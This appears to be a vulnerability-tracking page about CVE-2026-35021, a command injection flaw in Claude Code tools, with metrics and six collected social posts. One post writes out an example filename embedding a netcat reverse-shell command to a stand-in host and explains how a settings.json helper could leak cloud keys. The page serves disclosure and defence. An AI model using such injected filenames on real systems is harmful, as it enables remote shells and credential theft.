CVE-2026-35021Disclosure

LOW

Exploit discussion active in current signal (1 latest mentions)

Immediate actions

  • Patch affected systems immediately
  • Hunt for exploitation attempts and persistence artifacts
  • Increase monitoring for publicly documented tradecraft

Recommended action window: High priority (within 72h)

NVD description

Rejected reason: This CVE ID has been rejected by its CVE Numbering Authority (CNA). It was determined that the affected code path cannot be triggered through normal usage of Claude Code.

2.0/ 10 priority

Priority

LOW

Exploitation

NONE

PoC

YES

Patch

AVAILABLE

Momentum

STABLE

Threat summary

  • Public PoC is present in monitored signal
  • Patch or workaround signal is available
  • 6 mentions across 5 observed days
  • Momentum state: stable

What's happening

  • PoC mentioned or linked in 1 signal
  • Patch or workaround mentioned in 2 signals
  • Technical details provided in 6 signals
  • Disclosure: 5 classified signals
  • Peaked 4d ago at 2 mentions (2026-04-06); latest day: 1
  • 6 total mentions across 5 days

Deep dive

Activity timeline6 mentions / 5d
01122Mentions · 2026-04-06: 2Mentions · 2026-04-13: 1Mentions · 2026-04-19: 1Mentions · 2026-05-01: 1Mentions · 2026-05-16: 1PoC Mentioned / Linked · 2026-05-16: 1Patch / Workaround · 2026-04-19: 1Patch / Workaround · 2026-05-16: 1Technical Details · 2026-04-06: 2Technical Details · 2026-04-13: 1Technical Details · 2026-04-19: 1Technical Details · 2026-05-01: 1Technical Details · 2026-05-16: 104-0604-1304-1905-0105-16
Signal classification2 categories
Disclosure
583.3%
Patch
116.7%
Referenced assets5 URLs
Classification over time
DateTotalLabels
2026-04-062
Disclosure2
2026-04-131
Disclosure1
2026-04-191
Disclosure1
2026-05-011
Disclosure1
2026-05-161
Patch1
Full discourse6 posts
  • CVE@CVEnew
    Disclosure

    CVE-2026-35021 Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the prompt editor invocation utility that allows attackers to execute … https://www.cve.org/CVERecord?id=CVE-2026-35021

    Post summary

    The text announces the CVE‑2026‑35021 disclosure, noting an OS command injection flaw in Anthropic Claude tools, but provides no PoC, exploit, or mitigation details.

    00100295
    57.0K followersView on X
  • Martin Musiol@musiol_martin
    Patch

    CVE-2026-35021 hit @AnthropicAI Claude Code CLI and Agent SDK. OS command injection via crafted file paths. Patch is 2.0.65. The three-CVE chain (35020/21/22) reads attacker-controlled input then runs shell. Sandbox your agent or scope its tools. https://aigeneral.net

    Post summary

    CVE-2026-35021 is an OS command injection vulnerability affecting Claude Code CLI and Agent SDK, with patch 2.0.65 available; the issue involves attacker-controlled file paths that trigger shell execution.

    0000058
    398 followersView on X
  • DFIR Lab@DFIR_Lab
    Disclosure

    🚨 HIGH: CVE-2026-35021 (CVSS 7.8) Anthropic Claude Code CLI & Agent SDK vulnerable to OS command injection via malicious file paths. Attackers can execute arbitrary commands through shell metacharacters. Impact: Code execution with user privileges https://t.co/HBlDIk244U

    Post summary

    The tweet announces a high‑severity (CVSS 7.8) vulnerability, CVE-2026-35021, in Anthropic Claude Code CLI & Agent SDK that allows OS command injection via malicious file paths; it provides technical details but no exploit, patch, or claim of active exploitation.

    0000042
    11 followersView on X
  • SecureChap@SecureChap
    Disclosure

    CVE-2026-35022 in Claude Code let a single pull request steal API keys. One of three shell injection flaws disclosed this month in Claude Code 2.1.x. Root cause across all three: Node.js spawn with shell: true and unsanitized string interpolation. CWE-78. CVE-2026-35020 hit at CLI startup. Terminal detection ran sh -c with the TERMINAL env var interpolated in. A .env file or CI runner variable containing $() executed code on load, zero user interaction. CVE-2026-35021 struck during file opens. The editor invocation placed file paths inside double-quoted shell strings. POSIX section 2.2.3: double quotes do not block $() or backticks. A repo file named report`nc -e /bin/sh http://att.com 4444`.md fires on edit. CVE-2026-35022, CVSS 9.8. Authentication helpers in .claude/settings.json - like awsAuthRefresh - ran with full shell interpretation, outside the agent sandbox. Non-interactive mode skipped the trust dialog. A pull request editing settings.json exfiltrated AWS, GCP, and Anthropic API keys straight out of CI. Reported by Phoenix Security's Purple Code Navigator on 2026-03-31 after an accidental source code leak. Anthropic acknowledged the next day. Fix pattern: argv-based spawn, never exec with a shell string. Review .claude/settings.json diffs the way you review Dockerfile diffs. When your agent has your cloud credentials and reads files from random repos, a filename becomes an exploit.

    Post summary

    The post announces the discovery of four CLI and/editor related shell injection vulnerabilities in Claude Code, details their technical root causes, and provides a mitigation recommendation.

    0000054
    6 followersView on X
  • タカミ|製造業の営業企画×広報@eigyo_koho_mfg
    Disclosure

    エージェントに「実行権限」を渡した瞬間、組織の責任構造が問われる時代になった。 Claude CodeのCLIに深刻な脆弱性(CVE-2026-35021)が公表された。OSコマンド注入・RCEのリスク。しかも512,000行のCLIソースコードが流出したのは、ツールの問題じゃなく「人的ミス」だった。 ここが震えるポイントで。 どれだけ賢いエージェントを導入しても、設計の穴は人間が作る。最小権限・隔離環境・承認フロー・監査ログ——この4つを「後から整える」ではなく「最初から設計する」かどうかで、組織の未来が分かれる。 営業企画×広報でエージェントを使うなら、顧客情報とPR素材が混在する環境こそ一番危ない。便利さに乗っかる前に、守る設計を先に作ろう。 自動化は、準備した人だけが安全に速くなれる。 https://www.sentinelone.com/vulnerability-database/cve-2026-35021/ #AIエージェント

    Post summary

    The post announces the disclosure of CVE-2026-35021, an OS command injection leading to remote code execution in Claude Code’s CLI, noting a 512,000‑line source leak due to human error but providing no exploit code, active exploitation evidence, or patch details.

    0000057
    29 followersView on X
  • Infoflowcloud@infoflowcloud
    Disclosure

    🚨*CVE* CVE-2026-35021 Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the prompt editor invocation utility that allows attackers to execute … https://www.cve.org/CVERecord?id=CVE-2026-35021 ----- Traducción: CVE-2026-35021 Ant… http://infoflow.cloud`

    Post summary

    The post announces CVE‑2026‑35021, describing an OS command injection flaw in Anthropic Claude components, but does not provide any PoC, exploit, patch, or evidence of active exploitation.

    0000059
    67 followersView on X

Explore more